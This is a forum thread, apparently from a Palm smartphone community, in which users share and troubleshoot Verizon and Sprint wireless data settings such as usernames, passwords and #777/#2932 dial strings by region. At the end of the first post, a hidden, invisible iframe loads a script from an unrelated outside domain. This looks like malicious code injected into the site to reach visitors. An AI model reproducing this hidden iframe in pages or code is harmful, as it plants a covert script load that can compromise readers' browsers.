+ Reply to Thread
    AntiCT

FAQ Item: Network Settings

This applies to both Verizon and Sprint pones.

To set up configuration under Connection:
    Name: Wireless Modem (your choice to name)
    Connection Method: Wireless to Modem
    Dialing: Touchtone
    Volume: Off (your choice)
    Under Details:
    Speed: 19,200 bps
    Flow Ctl: Automatic
    Init String: leave blank

For Verizon users, your network settings should be:
    Service: Verizon (your choice to name)
    User Name: web
    Password: web
    Connection: Wireless Modem (or whatever you named above)
    Phone: #777

For Sprint users:
    Service: Sprint PCS (your choice to name)
    User Name: qnc
    Password: qnc
    Connection: Wireless Modem
    Phone: #2932

For Sprint users roaming on Verizon (such as Los Angeles), you are also able to use their system for wireless data access.

1. Make sure you do have automatic roaming with Verizon. Not all markets apply.
    2. Create a new network setting for Verizon (like above).
    3. When digital roaming, change the Network preference to Verizon, and connect.
    4. Use PQAs and other wireless apps as usual.

I imagine Verzon users can do the same also, but I can't verify that.

Note: For Sprint, there will be an appropriate roaming charge+applicable long distance. These changes range between 39 cents to 69 cents, plus 25 cents LD where applicable.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

rlucas

HOW TO: Sprint PCS Network Connection Eudora Web etc.

Folks:

It's been 2 weeks, and only now have I gotten any sort of answer from sprint and elsewhere as to setting up the actual tcp/ip connection. A lot of info out there tells folks to set up the connection as qnc/qnc, but web/web works. Here's the deal:

Preferences:Network
    Name: &lt;whatever&gt;
    Username: web
    Phone Number: #2932 (include the pound # sign)

This is just so people don't have to sit around waiting for mis- and under-informed reps at SPCS to give bogus info like I did!

Best,

Randall

6035 Veteran, 7135 N00b

Re: FAQ Item: Network Settings

[quote:adbe2d66fa][i:adbe2d66fa]Originally posted by AntiCT [/i:adbe2d66fa]
    For Verizon users, your network settings should be:
    [/quote:adbe2d66fa]

My Verizon phone came setup as follows:

I am able to connect and operate with those settings in the central Massachusetts (Worcester) region.

Dan Berlyoung

Network Settings in NE Ohio

I'm using the qnc/qnc and #777 settings here in Ohio and it works well.

Later,

Dan

I finally discovered that the user name and PW had to be QNC, not qnc in the Tampa Bay market. Working great now.

The qnc login and password has worked in my travels from Maine to Minnesota. What is this WEB login business?

Registered User All-Purpose Guru's Avatar
    [quote:452e6258d9="Asterisk"] The qnc login and password has worked in my travels from Maine to Minnesota. What is this WEB login business?[/quote:452e6258d9]

Especially with Verizon, which is still, in some cases, a hodgepodge of companies, different regions use different logon parameters.

Northern California: qnc/qnc (stands for Quick Network Connect, apparently-- this is what GTE Wireless used (before it got Verized)

Southern California: ati/ati (stands for Airtouch Internet, apparently-- Verizon in LA used to be called Airtouch)

The schweet thing about the PalmOS is it easily lets you have both on your phone, and you can just pick the one you want. The "Service" tab in the Network Preferences is actually editable and can be named to anything you want-- and the "Service" menu has commands to add and delete new services. I have a "Verizon NC" and "Verizon SC" service on my phone and I can switch whenever I need to. I also have a service for the dialup part of my DSL service for when I need a regular dialup connection.

Apologies if this is well-known to people-- it took *me* a while to figure it out.
    --apg

"Invention, my dear friends, is ninety-three percent perspiration, six percent electricity, four percent evaporation, and two percent butterscotch ripple." --W. Wonka

Re: FAQ Item: Network Settings

For Verizon

For Sprint users:
    Phone: #2932

THese are the settings for both carriers nationwide, regardless of region.

network settings

I can't get either one of them to work. Only have dixie cups and string here in Oklahoma.
    Tripper

Sorry for the previous post. I GOT IT TO WORK!!!!! I rembered seeing someone post that you have to put the # sign in front of 2932. I hadn't done it and now it works. This is cool.
    Tripper

Oh When that Shark Bites! LBOCEAN's Avatar

Re: network settings

Tripper: I can't get either one of them to work. Only have dixie cups and string here in Oklahoma.
    Perhaps upgrading to cans would help ?

Sorry, could'nt resist.

network settings

I'm a Sprint customer (for the time being) and have been trying web/web/#2932, connects but then gives error of "incomplete setup" "check phone number".
    Any ideas?

I have an i300 phone but it seems that people here know what they are talking about than the i300 posts. Anyway, I can't connect to all regions. There's only one spot that i can connect and that' in the middle of the freeway on the drive to work. Am I doing anything wrong?

P.S. I have verizon.

PJ

Quote Originally Posted by JoZeF-3D
    I have an i300 phone but it seems that people here know what they are talking about than the i300 posts. Anyway, I can't connect to all regions. There's only one spot that i can connect and that' in the middle of the freeway on the drive to work. Am I doing anything wrong?
    Well, I don't know about the VZW coverage issues... it sounds weird that it works in some places, but not most. People on VZW with phones such as the 6035 and 7135 use VZW QNC regularly, nearly everywhere. So there is little reason to expect that VZW QNC wouldn't work in most places that you get a VZW digital signal. However, the settings for VZW QNC are slightly different than for Sprint:

Check out this thread for more details:

FAQ Item: Network Settings